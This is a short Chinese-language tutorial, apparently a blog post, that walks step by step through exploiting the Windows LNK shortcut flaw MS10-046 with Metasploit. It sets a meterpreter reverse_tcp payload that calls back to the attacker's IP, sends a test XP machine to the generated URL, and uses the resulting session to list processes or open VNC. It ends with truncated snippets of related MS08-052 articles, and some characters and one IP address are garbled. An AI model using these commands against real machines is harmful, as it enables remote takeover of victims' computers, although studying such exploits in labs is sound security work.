這次用到ms10-046這個遠端執行漏洞(windows快捷方式lnk檔案自動執行**漏洞攻擊)
命令:1. msfconsole //啟動msf metasploit
2. search ms10-046 //搜尋漏洞
3. use windows/browser/ms10_046_shortcut_icon_dllloader //載入漏洞模組
4. set payload windows/meterpreter/reverse_tcp //設定乙個payload為**連線shell
5. show options //檢視相關設定
6. set srvhost 192.168.1.10 //設定攻擊者自身ip
7. set lhost 192.168.10 //設定**連線回來的ip (攻擊者自身ip)
8. exploit //開始執行漏洞...
會生成乙個url連線 複製這個位址 去另一台xp系統機器上測試 用瀏覽器開啟會跳到共享資料夾下
然後我們在來到msf終端看見漏洞執行成功了 有乙個連線會話 id 1
命令 :
sessions -l 檢視存在的會話
sessions -i 1 選著會話1
輸入ps命令檢視程序 或者 輸入run vnc 檢視遠端桌面 等等
MS10 046漏洞利用
漏洞披露 漏洞原理 如果顯示特製的快捷方式圖示,則該漏洞可能允許遠端執行 成功利用此漏洞的攻擊者可以獲得與本地使用者相同的使用者許可權。那些帳戶被配置為擁有較少系統使用者許可權的使用者比具有管理使用者許可權的使用者受到的影響要小。總的來說就是ie瀏覽器的圖示漏洞 漏洞利用 攻擊方 192.168.2...
MS08 052 WMF漏洞分析及漏洞測試
by cutek 一 背景知識 由檔案格式入手,來分析ms08 052漏洞,並構造了乙個可以使沒有補丁的程式崩潰的,1 wmf檔案結構 檔案頭 檔案記錄 檔案記錄 檔案記錄 windows中檔案頭結構如下 typedef struct pwmfrect16 typedef struct wmfpla...
MS08 052 WMF漏洞分析及漏洞測試
一 背景知識 由檔案格式入手,來分析ms08 052漏洞,並構造了乙個可以使沒有補丁的程式崩潰的,1 wmf檔案結構 檔案頭 檔案記錄 檔案記錄 檔案記錄 windows中檔案頭結構如下 typedef struct pwmfrect16 typedef struct wmfplaceablefil...